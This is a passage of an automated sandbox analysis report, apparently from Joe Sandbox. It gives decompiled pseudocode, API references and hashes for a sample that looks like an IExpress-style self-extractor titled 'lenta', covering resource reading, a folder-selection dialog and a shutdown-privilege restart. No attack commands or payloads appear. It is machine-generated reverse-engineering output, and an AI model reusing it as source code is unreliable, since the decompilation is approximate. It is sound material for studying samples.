                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							_pop(_t40);
                                                                                                                                                                                                                                              							return E00A86CE0(_t25, _t30, _v8 ^ _t44, _t37, _t40, _t41);
                                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                                              							_t28 = ExitWindowsEx(2, 0);
                                                                                                                                                                                                                                              							goto L16;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                                                              						_t37 = 0x522;
                                                                                                                                                                                                                                              						_t28 = E00A844B9(0, 0x522, 0xa81140, 0, 0x40, 4);
                                                                                                                                                                                                                                              						if(_t28 != 6) {
                                                                                                                                                                                                                                              							goto L16;
                                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                                              							goto L14;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					__eax = E00A81EA7(__ecx);
                                                                                                                                                                                                                                              					if(__eax != 2) {
                                                                                                                                                                                                                                              						L16:
                                                                                                                                                                                                                                              						return _t28;
                                                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                                                              						goto L12;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              			}

















                                                                                                                                                                                                                                              0x00a81fb4
                                                                                                                                                                                                                                              0x00a81fbb
                                                                                                                                                                                                                                              0x00a81fc3
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a81fc3
                                                                                                                                                                                                                                              0x00a81f9a
                                                                                                                                                                                                                                              0x00a81f9a
                                                                                                                                                                                                                                              0x00a81fa2
                                                                                                                                                                                                                                              0x00a81fd9
                                                                                                                                                                                                                                              0x00a81fda
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a81fa2

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000028,?,?), ref: 00A81EFB
                                                                                                                                                                                                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 00A81F02
                                                                                                                                                                                                                                              • ExitWindowsEx.USER32(00000002,00000000), ref: 00A81FD3
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.406290316.0000000000A81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406258413.0000000000A80000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406326237.0000000000A88000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_a80000_fDI32WO.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Process$CurrentExitOpenTokenWindows
                                                                                                                                                                                                                                              • String ID: SeShutdownPrivilege
                                                                                                                                                                                                                                              • API String ID: 2795981589-3733053543
                                                                                                                                                                                                                                              • Opcode ID: 585e4610e3141de8974bd33a6527017dae4118203758c87f7b4fdddf0d891b9c
                                                                                                                                                                                                                                              • Instruction ID: e89e4676fc1eaea406b45017c9a4e8ab69cb172ecf2936144c389bfb117efed5
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 585e4610e3141de8974bd33a6527017dae4118203758c87f7b4fdddf0d891b9c
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7C2186B1A402056BEB20BBE19C4AFBB7ABCEB95B50F10051AFB06D6181D7758C439761
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                                                              			E00A86CF0(struct _EXCEPTION_POINTERS* _a4) {
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				SetUnhandledExceptionFilter(0);
                                                                                                                                                                                                                                              				UnhandledExceptionFilter(_a4);
                                                                                                                                                                                                                                              				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                                                                                                                                                                                                              			}




                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00A86E26,00A81000), ref: 00A86CF7
                                                                                                                                                                                                                                              • UnhandledExceptionFilter.KERNEL32(00A86E26,?,00A86E26,00A81000), ref: 00A86D00
                                                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(C0000409,?,00A86E26,00A81000), ref: 00A86D0B
                                                                                                                                                                                                                                              • TerminateProcess.KERNEL32(00000000,?,00A86E26,00A81000), ref: 00A86D12
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.406290316.0000000000A81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406258413.0000000000A80000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406326237.0000000000A88000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_a80000_fDI32WO.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3231755760-0
                                                                                                                                                                                                                                              • Opcode ID: 885a3d48af57ea05ae6dca7f568e4c201cb87542fdbbf867fe52c8ae9f92ef9e
                                                                                                                                                                                                                                              • Instruction ID: c423bdf73ee839bf389d75c14231b98e415d2b2c3e8341f85c6cb5c3cec07ef9
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 885a3d48af57ea05ae6dca7f568e4c201cb87542fdbbf867fe52c8ae9f92ef9e
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BFD01232000108BBFB006BF1EC0CA593F28FB58712F484102F31D82020CB364453CB53
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 76%
                                                                                                                                                                                                                                              			E00A83210(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				void* _t6;
                                                                                                                                                                                                                                              				void* _t10;
                                                                                                                                                                                                                                              				int _t20;
                                                                                                                                                                                                                                              				int _t21;
                                                                                                                                                                                                                                              				int _t23;
                                                                                                                                                                                                                                              				char _t24;
                                                                                                                                                                                                                                              				long _t25;
                                                                                                                                                                                                                                              				int _t27;
                                                                                                                                                                                                                                              				int _t30;
                                                                                                                                                                                                                                              				void* _t32;
                                                                                                                                                                                                                                              				int _t33;
                                                                                                                                                                                                                                              				int _t34;
                                                                                                                                                                                                                                              				int _t37;
                                                                                                                                                                                                                                              				int _t38;
                                                                                                                                                                                                                                              				int _t39;
                                                                                                                                                                                                                                              				void* _t42;
                                                                                                                                                                                                                                              				void* _t46;
                                                                                                                                                                                                                                              				CHAR* _t49;
                                                                                                                                                                                                                                              				void* _t58;
                                                                                                                                                                                                                                              				void* _t63;
                                                                                                                                                                                                                                              				struct HWND__* _t64;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t64 = _a4;
                                                                                                                                                                                                                                              				_t6 = _a8 - 0x10;
                                                                                                                                                                                                                                              				if(_t6 == 0) {
					_push(0);
					L38:
					EndDialog(_t64, ??);
					L39:
					__eflags = 1;
					return 1;
				}
				_t42 = 1;
				_t10 = _t6 - 0x100;
				if(_t10 == 0) {
					E00A843D0(_t64, GetDesktopWindow());
					SetWindowTextA(_t64, "lenta");
					SendDlgItemMessageA(_t64, 0x835, 0xc5, 0x103, 0);
					__eflags =  *0xa89a40 - _t42; // 0x3
					if(__eflags == 0) {
						EnableWindow(GetDlgItem(_t64, 0x836), 0);
					}
					L36:
					return _t42;
				}
				if(_t10 == _t42) {
					_t20 = _a12 - 1;
					__eflags = _t20;
					if(_t20 == 0) {
						_t21 = GetDlgItemTextA(_t64, 0x835, 0xa891e4, 0x104);
						__eflags = _t21;
						if(_t21 == 0) {
							L32:
							_t58 = 0x4bf;
							_push(0);
							_push(0x10);
							_push(0);
							_push(0);
							L25:
							E00A844B9(_t64, _t58);
							goto L39;
						}
						_t49 = 0xa891e4;
						do {
							_t23 =  *_t49;
							_t49 =  &(_t49[1]);
							__eflags = _t23;
						} while (_t23 != 0);
						__eflags = _t49 - 0xa891e5 - 3;
						if(_t49 - 0xa891e5 < 3) {
							goto L32;
						}
						_t24 =  *0xa891e5; // 0x3a
						__eflags = _t24 - 0x3a;
						if(_t24 == 0x3a) {
							L21:
							_t25 = GetFileAttributesA(0xa891e4);
							__eflags = _t25 - 0xffffffff;
							if(_t25 != 0xffffffff) {
								L26:
								E00A8658A(0xa891e4, 0x104, 0xa81140);
								_t27 = E00A858C8(0xa891e4);
								__eflags = _t27;
								if(_t27 != 0) {
									__eflags =  *0xa891e4 - 0x5c;
									if( *0xa891e4 != 0x5c) {
										L30:
										_t30 = E00A8597D(0xa891e4, 1, _t64, 1);
										__eflags = _t30;
										if(_t30 == 0) {
											L35:
											_t42 = 1;
											__eflags = 1;
											goto L36;
										}
										L31:
										_t42 = 1;
										EndDialog(_t64, 1);
										goto L36;
									}
									__eflags =  *0xa891e5 - 0x5c;
									if( *0xa891e5 == 0x5c) {
										goto L31;
									}
									goto L30;
								}
								_push(0);
								_push(0x10);
								_push(0);
								_push(0);
								_t58 = 0x4be;
								goto L25;
							}
							_t32 = E00A844B9(_t64, 0x54a, 0xa891e4, 0, 0x20, 4);
							__eflags = _t32 - 6;
							if(_t32 != 6) {
								goto L35;
							}
							_t33 = CreateDirectoryA(0xa891e4, 0);
							__eflags = _t33;
							if(_t33 != 0) {
								goto L26;
							}
							_push(0);
							_push(0x10);
							_push(0);
							_push(0xa891e4);
							_t58 = 0x4cb;
							goto L25;
						}
						__eflags =  *0xa891e4 - 0x5c;
						if( *0xa891e4 != 0x5c) {
							goto L32;
						}
						__eflags = _t24 - 0x5c;
						if(_t24 != 0x5c) {
							goto L32;
						}
						goto L21;
					}
					_t34 = _t20 - 1;
					__eflags = _t34;
					if(_t34 == 0) {
						EndDialog(_t64, 0);
						 *0xa89124 = 0x800704c7;
						goto L39;
					}
					__eflags = _t34 != 0x834;
					if(_t34 != 0x834) {
						goto L36;
					}
					_t37 = LoadStringA( *0xa89a3c, 0x3e8, 0xa88598, 0x200);
					__eflags = _t37;
					if(_t37 != 0) {
						_t38 = E00A84224(_t64, _t46, _t46);
						__eflags = _t38;
						if(_t38 == 0) {
							goto L36;
						}
						_t39 = SetDlgItemTextA(_t64, 0x835, 0xa887a0);
						__eflags = _t39;
						if(_t39 != 0) {
							goto L36;
						}
                                                                                                                                                                                                                                              						_t63 = 0x4c0;
                                                                                                                                                                                                                                              						L9:
                                                                                                                                                                                                                                              						E00A844B9(_t64, _t63, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                              						_push(0);
                                                                                                                                                                                                                                              						goto L38;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					_t63 = 0x4b1;
                                                                                                                                                                                                                                              					goto L9;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return 0;
                                                                                                                                                                                                                                              			}

























                                                                                                                                                                                                                                              0x00a8324c
                                                                                                                                                                                                                                              0x00a8324c
                                                                                                                                                                                                                                              0x00a8324f
                                                                                                                                                                                                                                              0x00a832c8
                                                                                                                                                                                                                                              0x00a832ce
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a832ce
                                                                                                                                                                                                                                              0x00a83251
                                                                                                                                                                                                                                              0x00a83256
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a83271
                                                                                                                                                                                                                                              0x00a83277
                                                                                                                                                                                                                                              0x00a83279
                                                                                                                                                                                                                                              0x00a83298
                                                                                                                                                                                                                                              0x00a8329d
                                                                                                                                                                                                                                              0x00a8329f
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a832b0
                                                                                                                                                                                                                                              0x00a832b6
                                                                                                                                                                                                                                              0x00a832b8
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a832be
                                                                                                                                                                                                                                              0x00a83280
                                                                                                                                                                                                                                              0x00a83289
                                                                                                                                                                                                                                              0x00a8328e
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a8328e
                                                                                                                                                                                                                                              0x00a8327b
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a8327b
                                                                                                                                                                                                                                              0x00000000

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • LoadStringA.USER32(000003E8,00A88598,00000200), ref: 00A83271
                                                                                                                                                                                                                                              • GetDesktopWindow.USER32 ref: 00A833E2
                                                                                                                                                                                                                                              • SetWindowTextA.USER32(?,lenta), ref: 00A833F7
                                                                                                                                                                                                                                              • SendDlgItemMessageA.USER32(?,00000835,000000C5,00000103,00000000), ref: 00A83410
                                                                                                                                                                                                                                              • GetDlgItem.USER32(?,00000836), ref: 00A83426
                                                                                                                                                                                                                                              • EnableWindow.USER32(00000000), ref: 00A8342D
                                                                                                                                                                                                                                              • EndDialog.USER32(?,00000000), ref: 00A8343F
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.406290316.0000000000A81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406258413.0000000000A80000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406326237.0000000000A88000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_a80000_fDI32WO.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Window$Item$DesktopDialogEnableLoadMessageSendStringText
                                                                                                                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$lenta
                                                                                                                                                                                                                                              • API String ID: 2418873061-2011945725
                                                                                                                                                                                                                                              • Opcode ID: 265353d9d4438c29ca1c51b797041c65761740d8fdd5a8ffcfd407fd33065cc3
                                                                                                                                                                                                                                              • Instruction ID: 4b07df64b3d4c2a5bcc2d19a7e21829b07503a8c2ec1eeceff3a07d298d5b941
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 265353d9d4438c29ca1c51b797041c65761740d8fdd5a8ffcfd407fd33065cc3
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DC5157323412417BFF21BB759C8CFBB2E5CEB56F55F104229F6029A0D0DAA88A039361
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 93%
                                                                                                                                                                                                                                              			E00A82CAA(struct HINSTANCE__* __ecx, void* __edx, void* __eflags) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				char _v268;
                                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				signed int _t13;
                                                                                                                                                                                                                                              				void* _t20;
                                                                                                                                                                                                                                              				void* _t23;
                                                                                                                                                                                                                                              				void* _t27;
                                                                                                                                                                                                                                              				struct HRSRC__* _t31;
                                                                                                                                                                                                                                              				intOrPtr _t33;
                                                                                                                                                                                                                                              				void* _t43;
                                                                                                                                                                                                                                              				void* _t48;
                                                                                                                                                                                                                                              				signed int _t65;
                                                                                                                                                                                                                                              				struct HINSTANCE__* _t66;
                                                                                                                                                                                                                                              				signed int _t67;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t13 =  *0xa88004; // 0xd891196d
                                                                                                                                                                                                                                              				_v8 = _t13 ^ _t67;
                                                                                                                                                                                                                                              				_t65 = 0;
                                                                                                                                                                                                                                              				_t66 = __ecx;
                                                                                                                                                                                                                                              				_t48 = __edx;
                                                                                                                                                                                                                                              				 *0xa89a3c = __ecx;
                                                                                                                                                                                                                                              				memset(0xa89140, 0, 0x8fc);
                                                                                                                                                                                                                                              				memset(0xa88a20, 0, 0x32c);
                                                                                                                                                                                                                                              				memset(0xa888c0, 0, 0x104);
                                                                                                                                                                                                                                              				 *0xa893ec = 1;
                                                                                                                                                                                                                                              				_t20 = E00A8468F("TITLE", 0xa89154, 0x7f);
                                                                                                                                                                                                                                              				if(_t20 == 0 || _t20 > 0x80) {
                                                                                                                                                                                                                                              					_t64 = 0x4b1;
                                                                                                                                                                                                                                              					goto L32;
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					_t27 = CreateEventA(0, 1, 1, 0);
                                                                                                                                                                                                                                              					 *0xa8858c = _t27;
                                                                                                                                                                                                                                              					SetEvent(_t27);
                                                                                                                                                                                                                                              					_t64 = 0xa89a34;
                                                                                                                                                                                                                                              					if(E00A8468F("EXTRACTOPT", 0xa89a34, 4) != 0) {
                                                                                                                                                                                                                                              						if(( *0xa89a34 & 0x000000c0) == 0) {
                                                                                                                                                                                                                                              							L12:
                                                                                                                                                                                                                                              							 *0xa89120 =  *0xa89120 & _t65;
                                                                                                                                                                                                                                              							if(E00A85C9E(_t48, _t48, _t65, _t66) != 0) {
                                                                                                                                                                                                                                              								if( *0xa88a3a == 0) {
                                                                                                                                                                                                                                              									_t31 = FindResourceA(_t66, "VERCHECK", 0xa);
                                                                                                                                                                                                                                              									if(_t31 != 0) {
                                                                                                                                                                                                                                              										_t65 = LoadResource(_t66, _t31);
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              									if( *0xa88184 != 0) {
                                                                                                                                                                                                                                              										__imp__#17();
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              									if( *0xa88a24 == 0) {
                                                                                                                                                                                                                                              										_t57 = _t65;
                                                                                                                                                                                                                                              										if(E00A836EE(_t65) == 0) {
                                                                                                                                                                                                                                              											goto L33;
                                                                                                                                                                                                                                              										} else {
                                                                                                                                                                                                                                              											_t33 =  *0xa89a40; // 0x3
                                                                                                                                                                                                                                              											_t48 = 1;
                                                                                                                                                                                                                                              											if(_t33 == 1 || _t33 == 2 || _t33 == 3) {
                                                                                                                                                                                                                                              												if(( *0xa89a34 & 0x00000100) == 0 || ( *0xa88a38 & 0x00000001) != 0 || E00A818A3(_t64, _t66) != 0) {
                                                                                                                                                                                                                                              													goto L30;
                                                                                                                                                                                                                                              												} else {
                                                                                                                                                                                                                                              													_t64 = 0x7d6;
                                                                                                                                                                                                                                              													if(E00A86517(_t57, 0x7d6, _t34, E00A819E0, 0x547, 0x83e) != 0x83d) {
                                                                                                                                                                                                                                              														goto L33;
                                                                                                                                                                                                                                              													} else {
                                                                                                                                                                                                                                              														goto L30;
                                                                                                                                                                                                                                              													}
                                                                                                                                                                                                                                              												}
                                                                                                                                                                                                                                              											} else {
                                                                                                                                                                                                                                              												L30:
                                                                                                                                                                                                                                              												_t23 = _t48;
                                                                                                                                                                                                                                              											}
                                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                                              									} else {
                                                                                                                                                                                                                                              										_t23 = 1;
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              								} else {
                                                                                                                                                                                                                                              									E00A82390(0xa88a3a);
                                                                                                                                                                                                                                              									goto L33;
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                                                              								_t64 = 0x520;
                                                                                                                                                                                                                                              								L32:
                                                                                                                                                                                                                                              								E00A844B9(0, _t64, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                              								goto L33;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                                              							_t64 =  &_v268;
                                                                                                                                                                                                                                              							if(E00A8468F("INSTANCECHECK",  &_v268, 0x104) == 0) {
                                                                                                                                                                                                                                              								goto L3;
                                                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                                                              								_t43 = CreateMutexA(0, 1,  &_v268);
                                                                                                                                                                                                                                              								 *0xa88588 = _t43;
                                                                                                                                                                                                                                              								if(_t43 == 0 || GetLastError() != 0xb7) {
                                                                                                                                                                                                                                              									goto L12;
                                                                                                                                                                                                                                              								} else {
                                                                                                                                                                                                                                              									if(( *0xa89a34 & 0x00000080) == 0) {
                                                                                                                                                                                                                                              										_t64 = 0x524;
                                                                                                                                                                                                                                              										if(E00A844B9(0, 0x524, ?str?, 0, 0x20, 4) == 6) {
                                                                                                                                                                                                                                              											goto L12;
                                                                                                                                                                                                                                              										} else {
                                                                                                                                                                                                                                              											goto L11;
                                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                                              									} else {
                                                                                                                                                                                                                                              										_t64 = 0x54b;
                                                                                                                                                                                                                                              										E00A844B9(0, 0x54b, "lenta", 0, 0x10, 0);
                                                                                                                                                                                                                                              										L11:
                                                                                                                                                                                                                                              										CloseHandle( *0xa88588);
                                                                                                                                                                                                                                              										 *0xa89124 = 0x800700b7;
                                                                                                                                                                                                                                              										goto L33;
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                                                              						L3:
                                                                                                                                                                                                                                              						_t64 = 0x4b1;
                                                                                                                                                                                                                                              						E00A844B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                              						 *0xa89124 = 0x80070714;
                                                                                                                                                                                                                                              						L33:
                                                                                                                                                                                                                                              						_t23 = 0;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return E00A86CE0(_t23, _t48, _v8 ^ _t67, _t64, _t65, _t66);
                                                                                                                                                                                                                                              			}



















                                                                                                                                                                                                                                              0x00a82e48
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a82e48
                                                                                                                                                                                                                                              0x00a82e30
                                                                                                                                                                                                                                              0x00a82e30
                                                                                                                                                                                                                                              0x00a82ef8
                                                                                                                                                                                                                                              0x00a82f01
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a82f01
                                                                                                                                                                                                                                              0x00a82d8a
                                                                                                                                                                                                                                              0x00a82d8f
                                                                                                                                                                                                                                              0x00a82da1
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a82da3
                                                                                                                                                                                                                                              0x00a82dae
                                                                                                                                                                                                                                              0x00a82db4
                                                                                                                                                                                                                                              0x00a82dbb
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a82dca
                                                                                                                                                                                                                                              0x00a82dd3
                                                                                                                                                                                                                                              0x00a82df5
                                                                                                                                                                                                                                              0x00a82e02
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a82dd5
                                                                                                                                                                                                                                              0x00a82dde
                                                                                                                                                                                                                                              0x00a82de3
                                                                                                                                                                                                                                              0x00a82e04
                                                                                                                                                                                                                                              0x00a82e0a
                                                                                                                                                                                                                                              0x00a82e10
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a82e10
                                                                                                                                                                                                                                              0x00a82dd3
                                                                                                                                                                                                                                              0x00a82dbb
                                                                                                                                                                                                                                              0x00a82da1
                                                                                                                                                                                                                                              0x00a82d5b
                                                                                                                                                                                                                                              0x00a82d5b
                                                                                                                                                                                                                                              0x00a82d5d
                                                                                                                                                                                                                                              0x00a82d69
                                                                                                                                                                                                                                              0x00a82d6e
                                                                                                                                                                                                                                              0x00a82f06
                                                                                                                                                                                                                                              0x00a82f06
                                                                                                                                                                                                                                              0x00a82f06
                                                                                                                                                                                                                                              0x00a82d59
                                                                                                                                                                                                                                              0x00a82f18

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • memset.MSVCRT ref: 00A82CD9
                                                                                                                                                                                                                                              • memset.MSVCRT ref: 00A82CE9
                                                                                                                                                                                                                                              • memset.MSVCRT ref: 00A82CF9
                                                                                                                                                                                                                                                • Part of subcall function 00A8468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A846A0
                                                                                                                                                                                                                                                • Part of subcall function 00A8468F: SizeofResource.KERNEL32(00000000,00000000,?,00A82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A846A9
                                                                                                                                                                                                                                                • Part of subcall function 00A8468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A846C3
                                                                                                                                                                                                                                                • Part of subcall function 00A8468F: LoadResource.KERNEL32(00000000,00000000,?,00A82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A846CC
                                                                                                                                                                                                                                                • Part of subcall function 00A8468F: LockResource.KERNEL32(00000000,?,00A82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A846D3
                                                                                                                                                                                                                                                • Part of subcall function 00A8468F: memcpy_s.MSVCRT ref: 00A846E5
                                                                                                                                                                                                                                                • Part of subcall function 00A8468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00A846EF
                                                                                                                                                                                                                                              • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A82D34
                                                                                                                                                                                                                                              • SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,00000002,00000000), ref: 00A82D40
                                                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000001,?,00000104,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00A82DAE
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 00A82DBD
                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(lenta,00000000,00000020,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00A82E0A
                                                                                                                                                                                                                                                • Part of subcall function 00A844B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A84518
                                                                                                                                                                                                                                                • Part of subcall function 00A844B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00A84554
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.406290316.0000000000A81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406258413.0000000000A80000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406326237.0000000000A88000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_a80000_fDI32WO.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Resource$memset$CreateEventFindLoad$CloseErrorFreeHandleLastLockMessageMutexSizeofStringmemcpy_s
                                                                                                                                                                                                                                              • String ID: EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK$lenta
                                                                                                                                                                                                                                              • API String ID: 1002816675-2993962200
                                                                                                                                                                                                                                              • Opcode ID: 3c9070369882336c3868a1800679091b8048ddc6298718b7c67a875ac131b198
                                                                                                                                                                                                                                              • Instruction ID: 31631e808faf18df963a440d68a05ce33fd2d283c1a7c16a5a5ac2c6b8966110
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3c9070369882336c3868a1800679091b8048ddc6298718b7c67a875ac131b198
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3851D0706403016BE764FBA09D4ABBB3AA9EB45740F44403AFA82D61D1EFB88C53C725
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

